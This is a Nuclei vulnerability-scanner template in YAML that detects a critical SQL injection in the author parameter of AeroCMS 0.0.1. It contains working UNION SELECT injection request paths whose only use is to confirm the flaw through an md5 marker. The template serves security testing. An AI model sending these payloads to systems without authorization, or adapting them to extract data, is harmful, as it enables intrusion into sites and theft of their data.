nuclei-templates/http/vulnerabilities/other/aerocms-sqli.yaml

41 lines
1.3 KiB
YAML
Raw Normal View History

2022-10-20 06:53:03 +00:00
id: aerocms-sqli
info:
name: AeroCMS 0.0.1 - SQL Injection
2022-10-20 06:53:03 +00:00
author: shivampand3y
severity: critical
2022-10-20 06:53:03 +00:00
description: |
AeroCMS 0.0.1 contains a SQL injection vulnerability via the author parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-10-20 06:53:03 +00:00
reference:
- https://www.exploit-db.com/exploits/51022
2022-10-20 07:15:34 +00:00
- https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89
2022-10-20 06:53:03 +00:00
metadata:
max-request: 2
2022-10-20 06:53:03 +00:00
verified: true
tags: aero,cms,sqli,edb
2022-10-20 06:53:03 +00:00
variables:
num: "999999999"
http:
2022-10-20 06:53:03 +00:00
- method: GET
path:
- '{{BaseURL}}/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1'
2022-10-20 07:29:46 +00:00
- '{{BaseURL}}/cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1'
2022-10-20 06:53:03 +00:00
2022-10-20 07:29:46 +00:00
stop-at-first-match: true
2022-10-20 06:53:03 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: status
status:
- 200